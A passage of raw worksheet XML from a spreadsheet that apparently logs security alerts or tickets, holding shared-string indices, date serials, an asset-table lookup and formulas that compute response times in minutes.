      <c r="AC95" s="14">
        <v>45895.6385416667</v>
      </c>
      <c r="AD95" s="14"/>
      <c r="AE95" s="10"/>
      <c r="AF95" s="14"/>
      <c r="AG95" s="14">
        <v>45895.6385416667</v>
      </c>
      <c r="AH95" s="10"/>
      <c r="AI95" s="10"/>
      <c r="AJ95" s="10"/>
      <c r="AK95" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL95" s="10" t="s">
        <v>11767</v>
      </c>
      <c r="AM95" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN95" s="10"/>
      <c r="AO95" s="10"/>
      <c r="AP95" s="10"/>
      <c r="AQ95" s="10" t="s">
        <v>11645</v>
      </c>
      <c r="AR95" s="10"/>
      <c r="AS95" s="10" t="s">
        <v>11664</v>
      </c>
      <c r="AT95" s="14"/>
      <c r="AU95" s="10"/>
      <c r="AV95" s="10" t="s">
        <v>11665</v>
      </c>
      <c r="AW95" s="10"/>
      <c r="AX95" s="14"/>
      <c r="AY95" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ95" s="9" t="str">
        <f t="shared" si="11"/>
        <v/>
      </c>
      <c r="BA95" s="9" t="str">
        <f t="shared" si="15"/>
        <v/>
      </c>
      <c r="BB95" s="9" t="str">
        <f t="shared" si="12"/>
        <v/>
      </c>
      <c r="BC95" s="9" t="str">
        <f t="shared" si="13"/>
        <v/>
      </c>
      <c r="BD95" s="9" t="str">
        <f t="shared" si="14"/>
        <v/>
      </c>
    </row>
    <row r="96" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A96" s="1" t="s">
        <v>182</v>
      </c>
      <c r="B96" s="2">
        <v>45896.6151851852</v>
      </c>
      <c r="C96" s="10" t="s">
        <v>11621</v>
      </c>
      <c r="D96" s="10" t="s">
        <v>11768</v>
      </c>
      <c r="E96" s="10"/>
      <c r="F96" s="10"/>
      <c r="G96" s="10"/>
      <c r="H96" s="10"/>
      <c r="I96" s="11" t="s">
        <v>11586</v>
      </c>
      <c r="J96" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K96" s="10"/>
      <c r="L96" s="10"/>
      <c r="M96" s="10"/>
      <c r="N96" s="10" t="s">
        <v>11623</v>
      </c>
      <c r="O96" s="15" t="s">
        <v>11624</v>
      </c>
      <c r="P96" s="10" t="s">
        <v>11769</v>
      </c>
      <c r="Q96" s="10"/>
      <c r="R96" s="10"/>
      <c r="S96" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T96" s="10"/>
      <c r="U96" s="10"/>
      <c r="V96" s="13" t="s">
        <v>8377</v>
      </c>
      <c r="W96" s="10" t="s">
        <v>11642</v>
      </c>
      <c r="X96" s="10"/>
      <c r="Y96" s="10" t="s">
        <v>11770</v>
      </c>
      <c r="Z96" s="10" t="s">
        <v>370</v>
      </c>
      <c r="AA96" s="10"/>
      <c r="AB96" s="10"/>
      <c r="AC96" s="14">
        <v>45922.4665046296</v>
      </c>
      <c r="AD96" s="14"/>
      <c r="AE96" s="14"/>
      <c r="AF96" s="14"/>
      <c r="AG96" s="14">
        <v>45922.4665046296</v>
      </c>
      <c r="AH96" s="10"/>
      <c r="AI96" s="10"/>
      <c r="AJ96" s="10"/>
      <c r="AK96" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL96" s="10" t="s">
        <v>11771</v>
      </c>
      <c r="AM96" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN96" s="10"/>
      <c r="AO96" s="10"/>
      <c r="AP96" s="10"/>
      <c r="AQ96" s="10" t="s">
        <v>11586</v>
      </c>
      <c r="AR96" s="10"/>
      <c r="AS96" s="10" t="s">
        <v>11743</v>
      </c>
      <c r="AT96" s="10"/>
      <c r="AU96" s="10"/>
      <c r="AV96" s="10" t="s">
        <v>11744</v>
      </c>
      <c r="AW96" s="10"/>
      <c r="AX96" s="14"/>
      <c r="AY96" s="1" t="e">
        <f>VLOOKUP(E96,资产表!C:AG,31,0)</f>
        <v>#N/A</v>
      </c>
      <c r="AZ96" s="9" t="str">
        <f t="shared" si="11"/>
        <v/>
      </c>
      <c r="BA96" s="9" t="str">
        <f t="shared" si="15"/>
        <v/>
      </c>
      <c r="BB96" s="9" t="str">
        <f t="shared" si="12"/>
        <v/>
      </c>
      <c r="BC96" s="9" t="str">
        <f t="shared" si="13"/>
        <v/>
      </c>
      <c r="BD96" s="9" t="str">
        <f t="shared" si="14"/>
        <v/>
      </c>
    </row>
    <row r="97" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A97" s="1" t="s">
        <v>182</v>
      </c>
      <c r="B97" s="2">
        <v>45897.4121527778</v>
      </c>
      <c r="C97" s="10" t="s">
        <v>11621</v>
      </c>
      <c r="D97" s="10" t="s">
        <v>11772</v>
      </c>
      <c r="E97" s="10"/>
      <c r="F97" s="10"/>
      <c r="G97" s="10"/>
      <c r="H97" s="10"/>
      <c r="I97" s="11" t="s">
        <v>11586</v>
      </c>
      <c r="J97" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K97" s="10"/>
      <c r="L97" s="10"/>
      <c r="M97" s="10"/>
      <c r="N97" s="10" t="s">
        <v>11623</v>
      </c>
      <c r="O97" s="15" t="s">
        <v>11624</v>
      </c>
      <c r="P97" s="10" t="s">
        <v>11773</v>
      </c>
      <c r="Q97" s="10"/>
      <c r="R97" s="10"/>
      <c r="S97" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T97" s="10"/>
      <c r="U97" s="10"/>
      <c r="V97" s="15" t="s">
        <v>8377</v>
      </c>
      <c r="W97" s="10" t="s">
        <v>11642</v>
      </c>
      <c r="X97" s="10"/>
      <c r="Y97" s="10" t="s">
        <v>11774</v>
      </c>
      <c r="Z97" s="10" t="s">
        <v>370</v>
      </c>
      <c r="AA97" s="10"/>
      <c r="AB97" s="10"/>
      <c r="AC97" s="14">
        <v>45922.4665046296</v>
      </c>
      <c r="AD97" s="14"/>
      <c r="AE97" s="14"/>
      <c r="AF97" s="14"/>
      <c r="AG97" s="14">
        <v>45922.4665046296</v>
      </c>
      <c r="AH97" s="10"/>
      <c r="AI97" s="10"/>
      <c r="AJ97" s="10"/>
      <c r="AK97" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL97" s="10" t="s">
        <v>11775</v>
      </c>
      <c r="AM97" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN97" s="10"/>
      <c r="AO97" s="10"/>
      <c r="AP97" s="10"/>
      <c r="AQ97" s="10" t="s">
        <v>11586</v>
      </c>
      <c r="AR97" s="10"/>
      <c r="AS97" s="10" t="s">
        <v>11743</v>
      </c>
      <c r="AT97" s="10"/>
      <c r="AU97" s="10"/>
      <c r="AV97" s="10" t="s">
        <v>11744</v>
      </c>
      <c r="AW97" s="10"/>
      <c r="AX97" s="14"/>
      <c r="AY97" s="1" t="e">
        <f>VLOOKUP(E97,资产表!C:AG,31,0)</f>
        <v>#N/A</v>
      </c>
      <c r="AZ97" s="9" t="str">
        <f t="shared" si="11"/>
        <v/>
      </c>
      <c r="BA97" s="9" t="str">
        <f t="shared" si="15"/>
        <v/>
      </c>
      <c r="BB97" s="9" t="str">
        <f t="shared" si="12"/>
        <v/>
      </c>
      <c r="BC97" s="9" t="str">
        <f t="shared" si="13"/>
        <v/>
      </c>
      <c r="BD97" s="9" t="str">
        <f t="shared" si="14"/>
        <v/>
      </c>
    </row>
    <row r="98" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A98" s="1" t="s">
        <v>182</v>
      </c>
      <c r="B98" s="2">
        <v>45897.6140972222</v>
      </c>
      <c r="C98" s="10" t="s">
        <v>11629</v>
      </c>
      <c r="D98" s="10" t="s">
        <v>11776</v>
      </c>
      <c r="E98" s="10"/>
      <c r="F98" s="10"/>
      <c r="G98" s="10"/>
      <c r="H98" s="10"/>
      <c r="I98" s="11" t="s">
        <v>11586</v>
      </c>
      <c r="J98" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K98" s="10"/>
      <c r="L98" s="10"/>
      <c r="M98" s="10"/>
      <c r="N98" s="10" t="s">
        <v>11631</v>
      </c>
      <c r="O98" s="17" t="s">
        <v>11624</v>
      </c>
      <c r="P98" s="10" t="s">
        <v>11777</v>
      </c>
      <c r="Q98" s="10"/>
      <c r="R98" s="10"/>
      <c r="S98" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T98" s="10"/>
      <c r="U98" s="10"/>
      <c r="V98" s="17" t="s">
        <v>8432</v>
      </c>
      <c r="W98" s="10"/>
      <c r="X98" s="10" t="s">
        <v>11778</v>
      </c>
      <c r="Y98" s="10" t="s">
        <v>11779</v>
      </c>
      <c r="Z98" s="10" t="s">
        <v>370</v>
      </c>
      <c r="AA98" s="10"/>
      <c r="AB98" s="10"/>
      <c r="AC98" s="14">
        <v>45897.635462963</v>
      </c>
      <c r="AD98" s="10"/>
      <c r="AE98" s="14"/>
      <c r="AF98" s="14"/>
      <c r="AG98" s="14">
        <v>45897.635462963</v>
      </c>
      <c r="AH98" s="10" t="s">
        <v>11780</v>
      </c>
      <c r="AI98" s="10"/>
      <c r="AJ98" s="10"/>
      <c r="AK98" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL98" s="10"/>
      <c r="AM98" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN98" s="10"/>
      <c r="AO98" s="10"/>
      <c r="AP98" s="10"/>
      <c r="AQ98" s="10" t="s">
        <v>11586</v>
      </c>
      <c r="AR98" s="10"/>
      <c r="AS98" s="14" t="s">
        <v>11781</v>
      </c>
      <c r="AT98" s="10"/>
      <c r="AU98" s="10"/>
      <c r="AV98" s="10" t="s">
        <v>11782</v>
      </c>
      <c r="AW98" s="10"/>
      <c r="AX98" s="14"/>
      <c r="AY98" s="1" t="e">
        <f>VLOOKUP(E98,资产表!C:AG,31,0)</f>
        <v>#N/A</v>
      </c>
      <c r="AZ98" s="9" t="str">
        <f t="shared" si="11"/>
        <v/>
      </c>
      <c r="BA98" s="9" t="str">
        <f t="shared" si="15"/>
        <v/>
      </c>
      <c r="BB98" s="9" t="str">
        <f t="shared" si="12"/>
        <v/>
      </c>
      <c r="BC98" s="9" t="str">
        <f t="shared" si="13"/>
        <v/>
      </c>
      <c r="BD98" s="9" t="str">
        <f t="shared" si="14"/>
        <v/>
      </c>
    </row>
    <row r="99" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A99" s="1" t="s">
        <v>182</v>
      </c>
      <c r="B99" s="2">
        <v>45898.4036111111</v>
      </c>
      <c r="C99" s="10" t="s">
        <v>11621</v>
      </c>
      <c r="D99" s="10" t="s">
        <v>11783</v>
      </c>
      <c r="E99" s="10"/>
      <c r="F99" s="10"/>
      <c r="G99" s="10"/>
      <c r="H99" s="10"/>
      <c r="I99" s="11" t="s">
        <v>11586</v>
      </c>
      <c r="J99" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K99" s="10"/>
      <c r="L99" s="10"/>
      <c r="M99" s="10"/>
      <c r="N99" s="10" t="s">
        <v>11623</v>
      </c>
      <c r="O99" s="12" t="s">
        <v>11624</v>
      </c>
      <c r="P99" s="10" t="s">
        <v>11784</v>
      </c>
      <c r="Q99" s="10"/>
      <c r="R99" s="10"/>
      <c r="S99" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T99" s="10"/>
      <c r="U99" s="10"/>
      <c r="V99" s="15" t="s">
        <v>8377</v>
      </c>
      <c r="W99" s="10" t="s">
        <v>11642</v>
      </c>
      <c r="X99" s="10"/>
      <c r="Y99" s="10" t="s">
        <v>11785</v>
      </c>
      <c r="Z99" s="10" t="s">
        <v>370</v>
      </c>
      <c r="AA99" s="10"/>
      <c r="AB99" s="10"/>
      <c r="AC99" s="14">
        <v>45922.4665046296</v>
      </c>
      <c r="AD99" s="14"/>
      <c r="AE99" s="10"/>
      <c r="AF99" s="14"/>
      <c r="AG99" s="14">
        <v>45922.4665046296</v>
      </c>
      <c r="AH99" s="10"/>
      <c r="AI99" s="10"/>
      <c r="AJ99" s="10"/>
      <c r="AK99" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL99" s="10" t="s">
        <v>11786</v>
      </c>
      <c r="AM99" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN99" s="10"/>
      <c r="AO99" s="10"/>
      <c r="AP99" s="10"/>
      <c r="AQ99" s="10" t="s">
        <v>11586</v>
      </c>
      <c r="AR99" s="10"/>
      <c r="AS99" s="10" t="s">
        <v>11743</v>
      </c>
      <c r="AT99" s="14"/>
      <c r="AU99" s="10"/>
      <c r="AV99" s="10" t="s">
        <v>11744</v>
      </c>
      <c r="AW99" s="10"/>
      <c r="AX99" s="14"/>
      <c r="AY99" s="1" t="e">
        <f>VLOOKUP(E99,资产表!C:AG,31,0)</f>
        <v>#N/A</v>
      </c>
      <c r="AZ99" s="9" t="str">
        <f t="shared" ref="AZ99:AZ130" si="16">IF(A99&lt;&gt;"最新威胁",ROUND((B99-AD99)*24*60,2),"")</f>
        <v/>
      </c>
      <c r="BA99" s="9" t="str">
        <f t="shared" si="15"/>
        <v/>
      </c>
      <c r="BB99" s="9" t="str">
        <f t="shared" ref="BB99:BB130" si="17">IF(A99&lt;&gt;"最新威胁",IF(ISBLANK(AX99),"",ROUND((AX99-B99)*24*60,2)),"")</f>
        <v/>
      </c>
      <c r="BC99" s="9" t="str">
        <f t="shared" ref="BC99:BC130" si="18">IF(A99&lt;&gt;"最新威胁",IF(ISBLANK(AF99),ROUND((AC99-B99)*24*60,2),ROUND((AF99-B99)*24*60,2)),"")</f>
        <v/>
      </c>
      <c r="BD99" s="9" t="str">
        <f t="shared" ref="BD99:BD130" si="19">IF(A99&lt;&gt;"最新威胁",IF(ISBLANK(AG99),ROUND((AC99-B99)*24*60,2),ROUND((AG99-B99)*24*60,2)),"")</f>
        <v/>
      </c>
    </row>
    <row r="100" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A100" s="1" t="s">
        <v>182</v>
      </c>
      <c r="B100" s="2">
        <v>45901.4172222222</v>
      </c>
      <c r="C100" s="10" t="s">
        <v>11621</v>
      </c>
      <c r="D100" s="10" t="s">
        <v>11787</v>
      </c>
      <c r="E100" s="10"/>
      <c r="F100" s="10"/>
      <c r="G100" s="10"/>
      <c r="H100" s="10"/>
      <c r="I100" s="11" t="s">
        <v>11586</v>
      </c>
      <c r="J100" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K100" s="10"/>
      <c r="L100" s="10"/>
      <c r="M100" s="10"/>
      <c r="N100" s="10" t="s">
        <v>11623</v>
      </c>
      <c r="O100" s="15" t="s">
        <v>11624</v>
      </c>
      <c r="P100" s="10" t="s">
        <v>11788</v>
      </c>
      <c r="Q100" s="10"/>
      <c r="R100" s="10"/>
      <c r="S100" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T100" s="10"/>
      <c r="U100" s="10"/>
      <c r="V100" s="13" t="s">
        <v>8377</v>
      </c>
      <c r="W100" s="10" t="s">
        <v>11642</v>
      </c>
      <c r="X100" s="10"/>
      <c r="Y100" s="10" t="s">
        <v>11789</v>
      </c>
      <c r="Z100" s="10" t="s">
        <v>370</v>
      </c>
      <c r="AA100" s="10"/>
      <c r="AB100" s="10"/>
      <c r="AC100" s="14">
        <v>45922.4665046296</v>
      </c>
      <c r="AD100" s="14"/>
      <c r="AE100" s="14"/>
      <c r="AF100" s="14"/>
      <c r="AG100" s="14">
        <v>45922.4665046296</v>
      </c>
      <c r="AH100" s="10"/>
      <c r="AI100" s="10"/>
      <c r="AJ100" s="10"/>
      <c r="AK100" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL100" s="10" t="s">
        <v>11790</v>
      </c>
      <c r="AM100" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN100" s="10"/>
      <c r="AO100" s="10"/>
      <c r="AP100" s="10"/>
      <c r="AQ100" s="10" t="s">
        <v>11586</v>
      </c>
      <c r="AR100" s="10"/>
      <c r="AS100" s="10" t="s">
        <v>11743</v>
      </c>
      <c r="AT100" s="10"/>
      <c r="AU100" s="10"/>
      <c r="AV100" s="10" t="s">
        <v>11744</v>
      </c>
      <c r="AW100" s="10"/>
      <c r="AX100" s="14"/>
      <c r="AY100" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ100" s="9" t="str">
        <f t="shared" si="16"/>
        <v/>
      </c>
      <c r="BA100" s="9" t="str">
        <f t="shared" si="15"/>
        <v/>
      </c>
      <c r="BB100" s="9" t="str">
        <f t="shared" si="17"/>
        <v/>
      </c>
      <c r="BC100" s="9" t="str">
        <f t="shared" si="18"/>
        <v/>
      </c>
      <c r="BD100" s="9" t="str">
        <f t="shared" si="19"/>
        <v/>
      </c>
    </row>
    <row r="101" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A101" s="1" t="s">
        <v>182</v>
      </c>
      <c r="B101" s="2">
        <v>45902.6017708333</v>
      </c>
      <c r="C101" s="10" t="s">
        <v>11732</v>
      </c>
      <c r="D101" s="10" t="s">
        <v>11791</v>
      </c>
      <c r="E101" s="10"/>
      <c r="F101" s="10"/>
      <c r="G101" s="10"/>
      <c r="H101" s="10"/>
      <c r="I101" s="11" t="s">
        <v>11586</v>
      </c>
      <c r="J101" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K101" s="10"/>
      <c r="L101" s="10"/>
      <c r="M101" s="10"/>
      <c r="N101" s="10" t="s">
        <v>11734</v>
      </c>
      <c r="O101" s="15" t="s">
        <v>11624</v>
      </c>
      <c r="P101" s="10" t="s">
        <v>11792</v>
      </c>
      <c r="Q101" s="10"/>
      <c r="R101" s="10"/>
      <c r="S101" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T101" s="10"/>
      <c r="U101" s="10"/>
      <c r="V101" s="13" t="s">
        <v>8377</v>
      </c>
      <c r="W101" s="10" t="s">
        <v>11642</v>
      </c>
      <c r="X101" s="10"/>
      <c r="Y101" s="10" t="s">
        <v>11793</v>
      </c>
      <c r="Z101" s="10" t="s">
        <v>370</v>
      </c>
      <c r="AA101" s="10"/>
      <c r="AB101" s="10"/>
      <c r="AC101" s="14">
        <v>45902.6266666667</v>
      </c>
      <c r="AD101" s="14"/>
      <c r="AE101" s="14"/>
      <c r="AF101" s="14"/>
      <c r="AG101" s="14">
        <v>45902.6266666667</v>
      </c>
      <c r="AH101" s="10"/>
      <c r="AI101" s="10"/>
      <c r="AJ101" s="10"/>
      <c r="AK101" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL101" s="10"/>
      <c r="AM101" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN101" s="10"/>
      <c r="AO101" s="10"/>
      <c r="AP101" s="10"/>
      <c r="AQ101" s="10" t="s">
        <v>11586</v>
      </c>
      <c r="AR101" s="10"/>
      <c r="AS101" s="10" t="s">
        <v>11794</v>
      </c>
      <c r="AT101" s="10"/>
      <c r="AU101" s="10"/>
      <c r="AV101" s="10" t="s">
        <v>11795</v>
      </c>
      <c r="AW101" s="10"/>
      <c r="AX101" s="14"/>
      <c r="AY101" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ101" s="9" t="str">
        <f t="shared" si="16"/>
        <v/>
      </c>
      <c r="BA101" s="9" t="str">
        <f t="shared" si="15"/>
        <v/>
      </c>
      <c r="BB101" s="9" t="str">
        <f t="shared" si="17"/>
        <v/>
      </c>
      <c r="BC101" s="9" t="str">
        <f t="shared" si="18"/>
        <v/>
      </c>
      <c r="BD101" s="9" t="str">
        <f t="shared" si="19"/>
        <v/>
      </c>
    </row>
    <row r="102" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A102" s="1" t="s">
        <v>182</v>
      </c>
      <c r="B102" s="2">
        <v>45903.4197337963</v>
      </c>
      <c r="C102" s="10" t="s">
        <v>11621</v>
      </c>
      <c r="D102" s="10" t="s">
        <v>11796</v>
      </c>
      <c r="E102" s="10"/>
      <c r="F102" s="10"/>
      <c r="G102" s="10"/>
      <c r="H102" s="10"/>
      <c r="I102" s="11" t="s">
        <v>11586</v>
      </c>
      <c r="J102" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K102" s="10"/>
      <c r="L102" s="10"/>
      <c r="M102" s="10"/>
      <c r="N102" s="10" t="s">
        <v>11623</v>
      </c>
      <c r="O102" s="12" t="s">
        <v>11624</v>
      </c>
      <c r="P102" s="10" t="s">
        <v>11797</v>
      </c>
      <c r="Q102" s="10"/>
      <c r="R102" s="10"/>
      <c r="S102" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T102" s="10"/>
      <c r="U102" s="10"/>
      <c r="V102" s="13" t="s">
        <v>8377</v>
      </c>
      <c r="W102" s="10" t="s">
        <v>11642</v>
      </c>
      <c r="X102" s="10"/>
      <c r="Y102" s="10" t="s">
        <v>11798</v>
      </c>
      <c r="Z102" s="10" t="s">
        <v>370</v>
      </c>
      <c r="AA102" s="10"/>
      <c r="AB102" s="10"/>
      <c r="AC102" s="14">
        <v>45922.4665046296</v>
      </c>
      <c r="AD102" s="14"/>
      <c r="AE102" s="14"/>
      <c r="AF102" s="14"/>
      <c r="AG102" s="14">
        <v>45922.4665046296</v>
      </c>
      <c r="AH102" s="10"/>
      <c r="AI102" s="10"/>
      <c r="AJ102" s="10"/>
      <c r="AK102" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL102" s="10" t="s">
        <v>11799</v>
      </c>
      <c r="AM102" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN102" s="10"/>
      <c r="AO102" s="10"/>
      <c r="AP102" s="10"/>
      <c r="AQ102" s="10" t="s">
        <v>11586</v>
      </c>
      <c r="AR102" s="10"/>
      <c r="AS102" s="10" t="s">
        <v>11743</v>
      </c>
      <c r="AT102" s="10"/>
      <c r="AU102" s="10"/>
      <c r="AV102" s="10" t="s">
        <v>11744</v>
      </c>
      <c r="AW102" s="10"/>
      <c r="AX102" s="14"/>
      <c r="AY102" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ102" s="9" t="str">
        <f t="shared" si="16"/>
        <v/>
      </c>
      <c r="BA102" s="9" t="str">
        <f t="shared" si="15"/>
        <v/>
      </c>
      <c r="BB102" s="9" t="str">
        <f t="shared" si="17"/>
        <v/>
      </c>
      <c r="BC102" s="9" t="str">
        <f t="shared" si="18"/>
        <v/>
      </c>
      <c r="BD102" s="9" t="str">
        <f t="shared" si="19"/>
        <v/>
      </c>
    </row>
    <row r="103" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A103" s="1" t="s">
        <v>182</v>
      </c>
      <c r="B103" s="2">
        <v>45905.4284375</v>
      </c>
      <c r="C103" s="10" t="s">
        <v>11629</v>
      </c>
      <c r="D103" s="10" t="s">
        <v>11800</v>
      </c>
      <c r="E103" s="10"/>
      <c r="F103" s="10"/>
      <c r="G103" s="10"/>
      <c r="H103" s="10"/>
      <c r="I103" s="18" t="s">
        <v>11586</v>
      </c>
      <c r="J103" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K103" s="10"/>
      <c r="L103" s="10"/>
      <c r="M103" s="10"/>
      <c r="N103" s="10" t="s">
        <v>11631</v>
      </c>
      <c r="O103" s="16" t="s">
        <v>11624</v>
      </c>
      <c r="P103" s="10" t="s">
        <v>11801</v>
      </c>
      <c r="Q103" s="10"/>
      <c r="R103" s="10"/>
      <c r="S103" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T103" s="10"/>
      <c r="U103" s="10"/>
      <c r="V103" s="15" t="s">
        <v>8432</v>
      </c>
      <c r="W103" s="10"/>
      <c r="X103" s="10" t="s">
        <v>11802</v>
      </c>
      <c r="Y103" s="10" t="s">
        <v>11803</v>
      </c>
      <c r="Z103" s="10" t="s">
        <v>370</v>
      </c>
      <c r="AA103" s="10"/>
      <c r="AB103" s="10"/>
      <c r="AC103" s="14">
        <v>45905.4485300926</v>
      </c>
      <c r="AD103" s="14"/>
      <c r="AE103" s="10"/>
      <c r="AF103" s="14"/>
      <c r="AG103" s="14">
        <v>45905.4485300926</v>
      </c>
      <c r="AH103" s="10" t="s">
        <v>11804</v>
      </c>
      <c r="AI103" s="10"/>
      <c r="AJ103" s="10"/>
      <c r="AK103" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL103" s="10"/>
      <c r="AM103" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN103" s="10"/>
      <c r="AO103" s="10"/>
      <c r="AP103" s="10"/>
      <c r="AQ103" s="10" t="s">
        <v>11586</v>
      </c>
      <c r="AR103" s="14"/>
      <c r="AS103" s="10" t="s">
        <v>11805</v>
      </c>
      <c r="AT103" s="10"/>
      <c r="AU103" s="10"/>
      <c r="AV103" s="10" t="s">
        <v>11806</v>
      </c>
      <c r="AW103" s="10"/>
      <c r="AX103" s="14"/>
      <c r="AY103" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ103" s="9" t="str">
        <f t="shared" si="16"/>
        <v/>
      </c>
      <c r="BA103" s="9" t="str">
        <f t="shared" si="15"/>
        <v/>
      </c>
      <c r="BB103" s="9" t="str">
        <f t="shared" si="17"/>
        <v/>
      </c>
      <c r="BC103" s="9" t="str">
        <f t="shared" si="18"/>
        <v/>
      </c>
      <c r="BD103" s="9" t="str">
        <f t="shared" si="19"/>
        <v/>
      </c>
    </row>
    <row r="104" s="1" customFormat="1" spans="1:56">
      <c r="A104" s="1" t="s">
        <v>311</v>
      </c>
      <c r="B104" s="2">
        <v>45909.0074537037</v>
      </c>
      <c r="C104" s="10" t="s">
        <v>11807</v>
      </c>
      <c r="D104" s="10" t="s">
        <v>8476</v>
      </c>
      <c r="E104" s="10" t="s">
        <v>812</v>
      </c>
      <c r="F104" s="10" t="s">
        <v>11578</v>
      </c>
      <c r="G104" s="10" t="s">
        <v>812</v>
      </c>
      <c r="H104" s="10"/>
      <c r="I104" s="11" t="s">
        <v>11680</v>
      </c>
      <c r="J104" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K104" s="10"/>
      <c r="L104" s="10" t="s">
        <v>3690</v>
      </c>
      <c r="M104" s="10" t="s">
        <v>11579</v>
      </c>
      <c r="N104" s="10" t="s">
        <v>11808</v>
      </c>
      <c r="O104" s="12" t="s">
        <v>8400</v>
      </c>
      <c r="P104" s="10"/>
      <c r="Q104" s="10"/>
      <c r="R104" s="10"/>
      <c r="S104" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T104" s="10" t="s">
        <v>121</v>
      </c>
      <c r="U104" s="10" t="s">
        <v>11415</v>
      </c>
      <c r="V104" s="15" t="s">
        <v>8400</v>
      </c>
      <c r="W104" s="10"/>
      <c r="X104" s="10" t="s">
        <v>11659</v>
      </c>
      <c r="Y104" s="10" t="s">
        <v>11413</v>
      </c>
      <c r="Z104" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA104" s="10"/>
      <c r="AB104" s="10" t="s">
        <v>11414</v>
      </c>
      <c r="AC104" s="14">
        <v>45926.6807986111</v>
      </c>
      <c r="AD104" s="14">
        <v>45909.0040509259</v>
      </c>
      <c r="AE104" s="14">
        <v>45909.0275347222</v>
      </c>
      <c r="AF104" s="14"/>
      <c r="AG104" s="14">
        <v>45926.6807638889</v>
      </c>
      <c r="AH104" s="10"/>
      <c r="AI104" s="10"/>
      <c r="AJ104" s="10"/>
      <c r="AK104" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL104" s="10" t="s">
        <v>812</v>
      </c>
      <c r="AM104" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN104" s="10"/>
      <c r="AO104" s="10" t="s">
        <v>8549</v>
      </c>
      <c r="AP104" s="10"/>
      <c r="AQ104" s="10" t="s">
        <v>11649</v>
      </c>
      <c r="AR104" s="10" t="s">
        <v>11685</v>
      </c>
      <c r="AS104" s="10"/>
      <c r="AT104" s="10"/>
      <c r="AU104" s="10"/>
      <c r="AV104" s="10" t="s">
        <v>11686</v>
      </c>
      <c r="AW104" s="10" t="s">
        <v>11586</v>
      </c>
      <c r="AX104" s="14">
        <v>45909.0275462963</v>
      </c>
      <c r="AY104" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ104" s="9">
        <f t="shared" si="16"/>
        <v>4.9</v>
      </c>
      <c r="BA104" s="9">
        <f t="shared" si="15"/>
        <v>28.93</v>
      </c>
      <c r="BB104" s="9">
        <f t="shared" si="17"/>
        <v>28.93</v>
      </c>
      <c r="BC104" s="9">
        <f t="shared" si="18"/>
        <v>25449.62</v>
      </c>
      <c r="BD104" s="9">
        <f t="shared" si="19"/>
        <v>25449.57</v>
      </c>
    </row>
    <row r="105" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A105" s="1" t="s">
        <v>182</v>
      </c>
      <c r="B105" s="2">
        <v>45910.4193865741</v>
      </c>
      <c r="C105" s="10" t="s">
        <v>11621</v>
      </c>
      <c r="D105" s="10" t="s">
        <v>11809</v>
      </c>
      <c r="E105" s="10"/>
      <c r="F105" s="10"/>
      <c r="G105" s="10"/>
      <c r="H105" s="10"/>
      <c r="I105" s="18" t="s">
        <v>11586</v>
      </c>
      <c r="J105" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K105" s="10"/>
      <c r="L105" s="10"/>
      <c r="M105" s="10"/>
      <c r="N105" s="10" t="s">
        <v>11623</v>
      </c>
      <c r="O105" s="15" t="s">
        <v>11624</v>
      </c>
      <c r="P105" s="10" t="s">
        <v>11810</v>
      </c>
      <c r="Q105" s="10"/>
      <c r="R105" s="10"/>
      <c r="S105" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T105" s="10"/>
      <c r="U105" s="10"/>
      <c r="V105" s="15" t="s">
        <v>8377</v>
      </c>
      <c r="W105" s="10" t="s">
        <v>11642</v>
      </c>
      <c r="X105" s="10"/>
      <c r="Y105" s="10" t="s">
